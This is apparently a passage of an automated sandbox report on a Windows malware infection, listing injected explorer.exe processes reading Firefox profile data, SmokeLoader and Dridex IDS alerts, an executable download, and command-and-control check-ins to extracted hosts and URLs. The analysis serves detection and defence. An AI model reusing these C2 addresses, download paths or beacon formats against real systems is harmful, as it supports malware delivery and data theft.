                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50017 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50018 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50019 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50020 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50021 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50027 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50029 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50031 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50033 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,8_2_00007FF6DFE2FB4C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,10_2_006E2B15
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,10_2_006E1D4A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,10_2_006E3ED9
                  Source: C:\Windows\explorer.exeCode function: 13_2_00CB30A8 FindFirstFileW,FindNextFileW,FindClose,13_2_00CB30A8
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_004010E0 GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,38_2_004010E0
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49765 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49798 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49755 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49776 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49836 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49826 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49866 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49875 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49807 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49896 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49905 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49915 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49925 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49886 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49815 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49943 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49847 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49955 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49962 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49787 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49933 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49973 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50001 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49983 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49995 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 187.131.253.169:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50032 -> 187.131.253.169:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49857 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 190.224.203.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 187.131.253.169:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50033 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50033 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50016 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50017 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50018 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50027 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50014 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50004 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50006 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50009 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50008 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50012 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50005 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50007 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50013 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50020 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50011 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50021 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50010 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50019 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50015 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50031 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50029 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.5:50031 -> 23.145.40.162:443
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.131.253.169 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 190.224.203.37 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                  Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                  Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                  Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                  Source: Joe Sandbox ViewIP Address: 190.224.203.37 190.224.203.37
                  Source: Joe Sandbox ViewIP Address: 190.224.203.37 190.224.203.37
                  Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
                  Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
                  Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.5:50004
                  Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ilsdlpkysrci.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://bebgtshlvflmuxm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ujkayjvdqul.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://eycfcgwvugnqxe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uggcvdvmydqspblb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ipavwsqiqelj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://bullivvhvmuc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kheehglmstrxeo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jhcyskiuwnguyo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://frkpgrboqqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://atbscwbcvtybbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://odhashqreyopr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://tbgynejneafdk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mqhahmibwlnntq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xdrrfipvxfhn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vgsfrcxsvaoca.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://msqyarjhmbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 501Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://cmiubtivnasjoudw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jiwfwlcanebf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://lymwoggejifjeow.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://sobtugvkyrrny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dwgdbsxrjnnesjc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdfqkdrqtsch.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yjbjsjjdituglvfr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifilpxcdnwgbgge.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ciwodbbyumgi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uctglujhyyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 177Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://semcigauupb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjkmetahcah.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fkvpkdvartxwe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hqcqhgjcmtgx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwtleoojxrcvopte.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://puvaafsthshrcum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: nwgrus.ru
